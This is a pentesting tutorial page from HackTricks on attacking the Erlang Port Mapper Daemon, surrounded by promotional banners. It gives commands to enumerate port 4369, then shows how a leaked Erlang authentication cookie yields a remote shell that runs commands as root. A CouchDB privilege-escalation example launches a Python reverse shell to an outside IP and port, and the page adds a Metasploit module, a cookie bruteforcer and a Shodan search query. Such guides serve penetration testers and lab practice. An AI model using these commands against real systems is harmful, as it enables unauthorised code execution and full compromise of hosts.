4369 - Pentesting Erlang Port Mapper Daemon (epmd)

​🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Basic Info
The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses.
Default port: 4369
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
This is used by default on RabbitMQ and CouchDB installations.
Enumeration
Manual
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
​
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
Automatic
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
​
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
Erlang Cookie RCE
Remote Connection
If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start. If not modified or set manually it is a random string [A:Z] with a length of 20 characters.
[email protected] ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh [email protected]
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
​
Eshell V8.1 (abort with ^G)
​
At last, we can start an erlang shell on the remote system.
​
([email protected])1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
More information in https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
The author also share a program to brutforce the cookie:
epmd_bf-0.1.tar.bz2
7KB
Binary
Local Connection
In this case we are going to abuse CouchDB to escalate privileges locally:
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE 
([email protected])1> rpc:call('[email protected]', os, cmd, [whoami]).
"homer\n"
([email protected])4> rpc:call('[email protected]', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution
You can use Canape HTB machine to practice how to exploit this vuln.
Metasploit
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
Shodan
port:4369 "at port"
​🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

Last modified 1mo ago